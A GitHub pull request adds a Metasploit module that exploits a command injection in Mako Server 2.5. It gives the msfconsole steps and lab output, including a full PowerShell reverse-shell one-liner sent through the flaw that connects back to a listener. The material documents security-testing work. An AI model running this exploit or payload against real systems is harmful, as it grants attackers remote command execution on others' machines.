Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Mako Server v2.5 command injection module/docs #9133

Merged
merged 2 commits into from Nov 8, 2017
Merged

Add Mako Server v2.5 command injection module/docs #9133

merged 2 commits into from Nov 8, 2017

Conversation

shogunlab
Copy link
Contributor

@shogunlab shogunlab commented Oct 27, 2017
edited

Add Mako Server v2.5 command injection module/docs.

This module exploits an OS command injection vulnerability in the tutorial page of Mako Server version 2.5 on Windows x86/x64 systems. It works by injecting arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Input will be saved on the target machine and can be executed by sending a GET request to manage.lsp.

msf-mako-example

Verification Steps

  • Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with Powershell for this example to work)
  • After installer finishes, double click the "Mako-Demo" shortcut on the desktop
  • Start msfconsole on host
  • use exploit/windows/http/makoserver_cmd_exec
  • set RHOST <IP address of target system>
  • check
  • set PAYLOAD cmd/windows/reverse_powershell
  • set LHOST <IP address of host system>
  • exploit
  • You should get a Windows command shell

Documentation

https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/http/makoserver_cmd_exec.md

Example Output

msf > use exploit/windows/http/makoserver_cmd_exec 
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
PAYLOAD => cmd/windows/reverse_powershell
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2
LHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > exploit

[*] Started reverse TCP handler on 10.10.10.2:4444 
[*] Sending payload to target...
[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49175) at 2017-10-26 21:23:59 -0400

Microsoft Windows
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Smith\Downloads\MakoServer>

Example Verbose Output

msf > use exploit/windows/http/makoserver_cmd_exec 
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf exploit(makoserver_cmd_exec) > set VERBOSE true
VERBOSE => true
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
PAYLOAD => cmd/windows/reverse_powershell
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2
LHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > check

[*] Trying to detect running Mako Server and necessary files...
[*] Mako Server save.lsp returns correct ouput.
[*] 10.10.10.3:80 The target appears to be vulnerable.
msf exploit(makoserver_cmd_exec) > exploit

[*] Started reverse TCP handler on 10.10.10.2:4444 
[*] Sending payload to target...
[*] Now executing the following command: os.execute([[powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='10.10.10.2';$p='4444';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};]])
[*] Sending PUT request to save.lsp...
[*] Sending GET request to manage.lsp...
[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49174) at 2017-10-26 21:21:08 -0400

Microsoft Windows
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Smith\Downloads\MakoServer>

@acammack-r7 acammack-r7 merged commit b96fa69 into rapid7:master Nov 8, 2017
acammack-r7 added a commit that referenced this pull request Nov 8, 2017
@acammack-r7
Land #9133, Command injection in Mako Server examples
39916ef
@acammack-r7 acammack-r7 mentioned this pull request Nov 8, 2017
Closed
@acammack-r7
Copy link
Contributor

Looks great, thanks! The exploit looks to work against the latest version and on other platforms, so I have added a ticket to do a little more work. If you want to do the porting let us know and we'll assign you to the ticket.

@acammack-r7
Copy link
Contributor

Release Notes

This exploit targets arbitrary Lua injection in the examples shipped with the cross-platform Mako Server IoT development toolkit.

@shogunlab
Copy link
Contributor Author

Awesome! Thank you so much, I would be happy to do the porting to Linux. I can start development on the port this week.

wvu added a commit to wvu/metasploit-framework that referenced this pull request Nov 9, 2017
@wvu
Fix rapid7#9133, makoserver_cmd_exec cleanup
7213e6c
@wvu
Copy link
Contributor

wvu commented Nov 9, 2017

Please see additional changes in #9193. Thanks!

@shogunlab
Copy link
Contributor Author

Thanks for adding those changes @wvu-r7! I learned a lot from looking at your commit, I'll make sure to include these sorts of additions in future code.

@wvu
Copy link
Contributor

wvu commented Nov 9, 2017

To be honest, this is a really clean module. Great work!

@shogunlab
Copy link
Contributor Author

That's great to hear, I'm trying hard to improve on my ruby programming and get accustomed to the framework. Thank you for the kind words! 👍

@shogunlab shogunlab deleted the makoserver_cmd_exec branch November 9, 2017 19:12
@tdoan-r7 tdoan-r7 added rn-exploit rn-enhancement release notes enhancement and removed rn-exploit rn-enhancement release notes enhancement labels Nov 17, 2017
todb-r7 pushed a commit to todb-r7/metasploit-framework that referenced this pull request Dec 18, 2017
Land rapid7#9180, @RootUp's Samsung Browser SOP module
e628497 
Also lands rapid7#9133, the docs for the same.
@todb-r7
Copy link

todb-r7 commented Dec 18, 2017

Whoops, that should have been #9311, not this PR, #9133.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
docs module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
6 participants
@shogunlab @acammack-r7 @wvu @todb-r7 @h00die @tdoan-r7